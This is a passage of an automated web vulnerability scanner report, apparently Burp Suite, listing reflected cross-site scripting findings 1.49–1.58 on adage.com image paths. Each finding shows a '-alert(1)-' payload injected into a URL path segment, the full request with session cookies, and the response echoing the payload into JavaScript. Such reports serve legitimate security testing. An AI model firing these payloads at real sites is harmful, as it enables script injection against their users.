User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:04 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=6D605979A092ABEE2102FE26C2B4B52BF9F485BE; path=/
Set-Cookie: HMAC=12969DE325D8F47BC149DD88BE224C8BC19AD2B4; path=/
Set-Cookie: HMAC=2520BB77540DA3DD1E2AADCFEABB43BA7A420A5E; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49479
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
x.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744535";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons/icon-yahoo.pngb7777"-alert(1)-"a13f0a5b58b"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.49. http://adage.com//images/save-and-share-icons/netlog.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/netlog.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40098"-alert(1)-"5bdb9e64bb8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images40098"-alert(1)-"5bdb9e64bb8/save-and-share-icons/netlog.png?1298427936 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=5DB15248E936155692048AB5E1A27814ABC079FB; path=/
Set-Cookie: HMAC=F2E896BEAFAC63FD27AA2B2C0F668A43C16FA082; path=/
Set-Cookie: HMAC=84C783314D78F7A2E59392367A2E7541518E47EF; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49475
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298427936";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images40098"-alert(1)-"5bdb9e64bb8/save-and-share-icons/netlog.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf
...[SNIP]...

1.50. http://adage.com//images/save-and-share-icons/netlog.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/netlog.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa8e5"-alert(1)-"356cce5b60c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-iconsaa8e5"-alert(1)-"356cce5b60c/netlog.png?1298427936 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:09 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=B9DE6A2E5668DB792D86574FB9EF7A1D0E1999D8; path=/
Set-Cookie: HMAC=BC8098D5DE4FB3BEE2565047DDFD41AABABA8571; path=/
Set-Cookie: HMAC=C1D6CA5A8519AD4E1D6BC8F5F51B57C7DC37E324; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49475
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298427936";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-iconsaa8e5"-alert(1)-"356cce5b60c/netlog.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft
...[SNIP]...

1.51. http://adage.com//images/save-and-share-icons/netlog.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/netlog.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29180"-alert(1)-"7329e8c1b16 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons/netlog.png29180"-alert(1)-"7329e8c1b16?1298427936 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:20 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=95A1D404B74E71A653659E651F368E002077580A; path=/
Set-Cookie: HMAC=803EF293FBD747A3743DC3E9C0C6B508235157A3; path=/
Set-Cookie: HMAC=FDF01D53DCACDD2EB0712B07C0C500C3242933F8; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49475
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
itbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298427936";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons/netlog.png29180"-alert(1)-"7329e8c1b16"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.52. http://adage.com//images/save-and-share-icons/orkut.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/orkut.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ef6f"-alert(1)-"e393df477e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images9ef6f"-alert(1)-"e393df477e/save-and-share-icons/orkut.png?1298427936 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:02 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=F7C04AF9750FD037CC700DD76F32912D4CFD32C6; path=/
Set-Cookie: HMAC=EE53B3C7F94EB877704D81822AECB9FF36810668; path=/
Set-Cookie: HMAC=827A59CAA3BF8FCF82E36B10930DE71A5DCF18C5; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49473
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298427936";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images9ef6f"-alert(1)-"e393df477e/save-and-share-icons/orkut.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf=
...[SNIP]...

1.53. http://adage.com//images/save-and-share-icons/orkut.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/orkut.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb17d"-alert(1)-"02e42cf89a6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-iconseb17d"-alert(1)-"02e42cf89a6/orkut.png?1298427936 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:15 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=A3D542D9D8140E3E396644E600DE413B6A444646; path=/
Set-Cookie: HMAC=CBB1D39221D1841A2A5E9BD122875AF1848FF30F; path=/
Set-Cookie: HMAC=FCC719BDD78F0FC769C20FF92F96615D8C5388A1; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49474
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298427936";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-iconseb17d"-alert(1)-"02e42cf89a6/orkut.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft=
...[SNIP]...

1.54. http://adage.com//images/save-and-share-icons/orkut.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/orkut.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad281"-alert(1)-"f7a28624ad2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons/orkut.pngad281"-alert(1)-"f7a28624ad2?1298427936 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:50 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=8D070851427E235F74F223B8727F505C1477358E; path=/
Set-Cookie: HMAC=5314A481DFCEC2446FD7BE8BFC5EB797DD7DEBF8; path=/
Set-Cookie: HMAC=6EC9373DE24A34A50C7575EEC6E06C6B3342A79C; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49474
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298427936";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons/orkut.pngad281"-alert(1)-"f7a28624ad2"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.55. http://adage.com//images/save-and-share-icons/viadeo.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/viadeo.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66b7c"-alert(1)-"2189b33e4aa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images66b7c"-alert(1)-"2189b33e4aa/save-and-share-icons/viadeo.png?1298427936 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:32 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=14A8E7653A1DB57C83129E74A8686535DE4CB7AA; path=/
Set-Cookie: HMAC=59964B6595D0DBEF621DB19254F34AF147E1B16D; path=/
Set-Cookie: HMAC=033890914EC603B86BD8A454B4AA582524502E0B; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49475
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298427936";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images66b7c"-alert(1)-"2189b33e4aa/save-and-share-icons/viadeo.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf
...[SNIP]...

1.56. http://adage.com//images/save-and-share-icons/viadeo.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/viadeo.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22daa"-alert(1)-"f28d957d2d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons22daa"-alert(1)-"f28d957d2d6/viadeo.png?1298427936 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:44 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=BA2A0B8985509B64D493B22EC43D3099FF0B0AF2; path=/
Set-Cookie: HMAC=66D815BCB02ED674D0FE9E0A23B49C51C8D98752; path=/
Set-Cookie: HMAC=7127BE450F47B623EF6AA45795CCC1EF282BEDCB; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49475
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298427936";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons22daa"-alert(1)-"f28d957d2d6/viadeo.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft
...[SNIP]...

1.57. http://adage.com//images/save-and-share-icons/viadeo.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/viadeo.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8f5b"-alert(1)-"4ba0874f211 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons/viadeo.pngb8f5b"-alert(1)-"4ba0874f211?1298427936 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:54 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=9178AC8C4F4D6A153EA595372096C5EB99ED7FC5; path=/
Set-Cookie: HMAC=A07B6A9AA752EC1B0785AF06B11BCE1485921E64; path=/
Set-Cookie: HMAC=CB9D8F3AB29F6B7C8E2F443C4D71A922AD286B4E; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49475
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
itbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298427936";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons/viadeo.pngb8f5b"-alert(1)-"4ba0874f211"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.58. http://adage.com//images/save-and-share-icons/xing.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/xing.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22b07"-alert(1)-"e0fa823c0eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images22b07"-alert(1)-"e0fa823c0eb/save-and-share-icons/xing.png?1298427936 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:31 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=4A32DF99F86ABC0B315B48731EC2417448EAC85B; path=/
Set-Cookie: HMAC=F99F4C5E11DB8B4CCF4C76F2F318BC100E895867; path=/
Set-Cookie: HMAC=3B8003E165F67B38DF0FE866AAC4B4F115960BE6; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49473
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298427936";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images22b07"-alert(1)-"e0fa823c0eb/save-and-share-icons/xing.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
